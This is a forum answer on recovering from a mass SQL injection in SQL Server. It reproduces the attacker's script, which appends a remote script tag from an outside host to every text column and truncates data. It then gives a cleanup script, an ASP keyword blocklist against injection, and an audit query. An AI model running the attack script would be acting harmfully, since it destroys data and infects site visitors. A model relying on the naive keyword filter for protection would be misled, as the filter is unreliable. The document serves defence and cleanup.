My database has had JS code injected into it, which is really annoying. How do I remove it completely, and how do I prevent it? Experts, please help.
1 answer
The injected SQL statement looks like this:
===============================================
-- The attacker's script, kept exactly as it was found.
DECLARE @T varchar(255), @C varchar(255)
-- Walk every varchar/nvarchar/text/ntext column of every user table
-- (xtype 99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar)
DECLARE Table_Cursor CURSOR FOR
  select a.name, b.name from sysobjects a, syscolumns b
  where a.id = b.id and a.xtype = 'u'
    and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
  -- convert(varchar, ...) without a length defaults to 30 characters, which is why
  -- longer values lose their original content and keep only the script tag
  exec('update [' + @T + '] set [' + @C + ']=rtrim(convert(varchar,[' + @C + ']))+''<script src=http://www.nmidahena.com/1.js></script>''')
  FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
==============================================
Nearly all of the varchar, nvarchar and ntext columns in the database get infected. Even more shameless: if a column is too small, it throws away the original content and keeps the complete <script src=http://www.nmidahena.com/1.js></script>. A lot of data was destroyed. After a whole day's work I finally came up with a way to remove these little tails:
===============================================
DECLARE @T varchar(255), @C varchar(255)
-- Same column selection as the injected script
DECLARE Table_Cursor CURSOR FOR
  select a.name, b.name from sysobjects a, syscolumns b
  where a.id = b.id and a.xtype = 'u'
    and (b.xtype = 99 or b.xtype = 35 or b.xtype = 231 or b.xtype = 167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
  -- Cut each value off just before the first '<script'; values without it are left unchanged.
  -- convert(nvarchar(max), ...) is used because convert(nvarchar, ...) with no length
  -- defaults to 30 characters and would itself truncate the data (nvarchar(max) needs SQL Server 2005 or later).
  exec('update [' + @T + '] set [' + @C + '] = (case when (CHARINDEX(''<script'', convert(nvarchar(max), [' + @C + '])) > 0) then left(rtrim(convert(nvarchar(max), [' + @C + '])), CHARINDEX(''<script'', convert(nvarchar(max), [' + @C + '])) - 1) else [' + @C + '] end)')
  FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
==============================================
CHARINDEX(''<script'', ['+ @C + '] ) is used here because many fields were infected several times over and ended up as content like <script src=<script src=http://www.nmidahena.com/1.js></script>. So <script is used as the marker and everything from it onward is deleted. This may delete some legitimate content, but there is no way around it... if you want it cleaned up thoroughly, it has to be done this way. Once that is done, apply a focused SQL filter to the site:
==========FilterSqlAttack.asp==============
<%
Call FilterSqlAttack()

' Reject any request whose query string or form fields contain one of the listed keywords
Sub FilterSqlAttack()
    dim sql_leach, sql_leach_0, Sql_DATA, SQL_Get, Sql_Post
    sql_leach = "and,exec,insert,select,delete,update,count,*,%,chr,mid,master,truncate,char,declare"
    sql_leach_0 = split(sql_leach, ",")

    ' Check every query-string parameter
    If Request.QueryString <> "" Then
        For Each SQL_Get In Request.QueryString
            For SQL_Data = 0 To Ubound(sql_leach_0)
                if instr(LCase(Request.QueryString(SQL_Get)), sql_leach_0(SQL_Data)) > 0 Then
                    Response.Write "请不要尝试进行SQL注入!"
                    Response.end
                end if
            next
        Next
    End If

    ' Check every form field
    If Request.Form <> "" Then
        For Each Sql_Post In Request.Form
            For SQL_Data = 0 To Ubound(sql_leach_0)
                if instr(LCase(Request.Form(Sql_Post)), sql_leach_0(SQL_Data)) > 0 Then
                    Response.Write "请不要尝试进行SQL注入!"
                    Response.end
                end if
            next
        next
    end if
End Sub
%>
Source: http://www.innto.cn
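Because the cleanup above is destructive and can remove legitimate content, it helps to know first which columns are actually hit. The following T-SQL audit is an added example, not part of the original answer; it assumes SQL Server 2005 or later (sys.tables, nvarchar(max)) and reports, per text column of every user table, how many rows still contain '<script'.

```sql
-- Added example, not from the original answer. Audit pass for SQL Server 2005+
-- (assumed): count, per text column of every user table, the rows that still
-- contain '<script', so the destructive cleanup can be scoped and backed up first.
SET NOCOUNT ON;

CREATE TABLE #infected (
    schema_name sysname,
    table_name  sysname,
    column_name sysname,
    hit_rows    int
);

DECLARE @sql nvarchar(max);
SET @sql = N'';

-- Build one INSERT ... SELECT COUNT(*) per candidate column. QUOTENAME is applied to
-- identifiers and literals so odd table or column names cannot break the dynamic SQL.
-- PATINDEX is used because it also accepts text/ntext columns.
SELECT @sql = @sql + N'
INSERT INTO #infected (schema_name, table_name, column_name, hit_rows)
SELECT ' + QUOTENAME(s.name, '''') + N', ' + QUOTENAME(t.name, '''') + N', '
         + QUOTENAME(c.name, '''') + N', COUNT(*)
FROM ' + QUOTENAME(s.name) + N'.' + QUOTENAME(t.name) + N'
WHERE PATINDEX(N''%<script%'', ' + QUOTENAME(c.name) + N') > 0
HAVING COUNT(*) > 0;'
FROM sys.tables  AS t
JOIN sys.schemas AS s  ON s.schema_id = t.schema_id
JOIN sys.columns AS c  ON c.object_id = t.object_id
JOIN sys.types   AS ty ON ty.user_type_id = c.user_type_id
-- the same four types the injected script targets (xtype 167, 231, 35, 99)
WHERE ty.name IN ('varchar', 'nvarchar', 'text', 'ntext');

EXEC sys.sp_executesql @sql;

-- Review this list (and take a backup) before running the UPDATE-based cleanup.
SELECT schema_name, table_name, column_name, hit_rows
FROM #infected
ORDER BY hit_rows DESC, schema_name, table_name, column_name;

DROP TABLE #infected;
```

Running it again after the cleanup should return an empty result set; any remaining rows point at columns the cleanup did not reach.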